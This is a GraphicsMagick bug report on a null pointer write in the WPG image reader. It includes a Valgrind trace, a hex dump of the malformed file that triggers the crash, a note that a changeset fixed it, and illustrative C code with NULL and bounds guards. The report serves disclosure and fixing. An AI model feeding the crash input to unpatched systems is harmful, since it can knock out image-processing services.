Null Pointer Dereference (Write) with malformed WPG Image
Brought to you by: bfriesen
Running ./gm identify -verbose %file% with a malformed input WPG image results in an attempt to write to a null memory address. The relevant stack trace can be seen here:
==26894== Invalid write of size 1
==26894==    at 0x69A596: ImportIndexQuantumType (import.c:404)
==26894==    by 0x69A596: ImportViewPixelArea (import.c:3593)
==26894==    by 0x693CF3: ImportImagePixelArea (import.c:278)
==26894==    by 0x62F631: InsertRow (wpg.c:0)
==26894==    by 0x62D923: UnpackWPGRaster (wpg.c:424)
==26894==    by 0x62D923: ReadWPGImage (wpg.c:1130)
==26894==    by 0x45B26A: ReadImage (constitute.c:1607)
==26894==    by 0x4263C8: IdentifyImageCommand (command.c:8377)
==26894==    by 0x42748F: MagickCommand (command.c:8872)
==26894==    by 0x441390: GMCommandSingle (command.c:17393)
==26894==    by 0x440708: GMCommand (command.c:17446)
==26894==    by 0x4032E5: main (gm.c:61)
==26894==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==26894==
Going through the source, it looks like the ImportIndexQuantumType function in magick/import.c is being invoked with an indexes value of NULL. This is being dereferenced in *indexes++=index, where the program tries to store the value of index at memory address 0x01.
The hex dump of the input that triggers the vulnerability is:
0000000 57ff 4350 0016 0000 1630 0001 3030 0000
0000010 3030 3030 3030 3014 3030 3030 3030 3030
0000020 3030 0030 0001 0008 3030 3030 3030 3030
0000030 3030 3030 3030 3030 3030 3030 3030 3030
0000040 3030 3030 3030 3030 fb30 3030 3030 3030
0000050 3030 3030 3030 3030 3030 3030 3030 3030
*
0000140 3030 3030 3030 3013 3030 3030 3030 3030
0000150 3030 3030 3030 3030 3030 3030 3030 3030
*
00001b0 3030 3030 3030 3030 3030 3030 3030 ff1b
00001c0 007f 3030 3030 3030 3030 3030 3030 3030
00001d0 3030 3030 3030 3030 3030 3030 3030 3030
*
00001f0 3030 3030 3030 3030 3030 3030 3030 021c
0000200 3030 3030 3030 3030 3030 3030 3030 3030
*
0000270 3030 3030 307f 3030 3030 3030 3030 3030
0000280 3030 3030 3030 3030 3030 3030 3030 3030
*
00002f0 3030 3030 2a30 3030 3030 3030 3030 3030
0000300 3030 3030 3030 3030 3030 3030 3030 3030
*
0000320 2c30 3030 3030 3030 3030 3030 3030 3030
0000330 3030 3030 3030 3030 3030 3030 3030 3030
0000340 3030 3030 3030 3030 3030 3030 3030 3014
0000350 3030 3030 3030 3030 3030 0030 3030 0004
*
0000365
Environmental Information:
This problem is fixed by Mercurial changeset 15245:e8086faa52d0. Thank you very much for reporting it.
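The defect described in the report is a store through an index pointer that the caller never validated: when the image carries no colormap, the index buffer is NULL, and `*indexes++=index` writes to address 0. The following is an added illustration, not GraphicsMagick's code and not the content of changeset 15245:e8086faa52d0, of the kind of guard a practitioner would expect at that boundary. The function name `import_index_quantum`, the `IndexPacket` typedef, the palette-clamp behaviour and the sample row are all assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical, simplified stand-in for an indexed-quantum import routine.
 * It models the "*indexes++ = index" store the report describes and adds
 * the NULL/bounds guards whose absence the Valgrind trace exposes.
 * Returns the number of index values stored, or -1 if the call is rejected. */
typedef uint16_t IndexPacket;   /* assumed palette-index type */

long import_index_quantum(const unsigned char *src, size_t src_len,
                          IndexPacket *indexes, size_t count,
                          size_t palette_size)
{
    /* Guard 1: an image without a colormap has no index channel, so a
       NULL index buffer must be rejected instead of written through. */
    if (indexes == NULL || src == NULL)
        return -1;
    /* Guard 2: never read past the packed source row. */
    if (count > src_len)
        return -1;
    for (size_t i = 0; i < count; i++) {
        IndexPacket index = src[i];
        /* Guard 3: clamp out-of-range palette indices so a later colormap
           lookup cannot read beyond the palette. */
        if (palette_size != 0 && index >= palette_size)
            index = (IndexPacket)(palette_size - 1);
        *indexes++ = index;   /* the store that faulted at address 0x0 */
    }
    return (long)count;
}

/* Driver: a constructed 8-pixel row, imported once into a real index
   buffer and once with the NULL buffer a colormap-less image presents. */
int main(void)
{
    const unsigned char row[8] = {0, 1, 2, 3, 4, 5, 6, 255};  /* constructed */
    IndexPacket out[8];
    long n = import_index_quantum(row, sizeof row, out, 8, 256);
    printf("stored %ld indexes, last = %u\n", n, (unsigned)out[7]);
    n = import_index_quantum(row, sizeof row, NULL, 8, 256);
    printf("NULL index buffer rejected: %ld\n", n);
    return 0;
}
```

The point of the guard is that the decision about whether an index channel exists belongs with the reader that knows the image's colormap state; pushing a NULL buffer into a generic import routine leaves that routine with no safe option but to refuse the call.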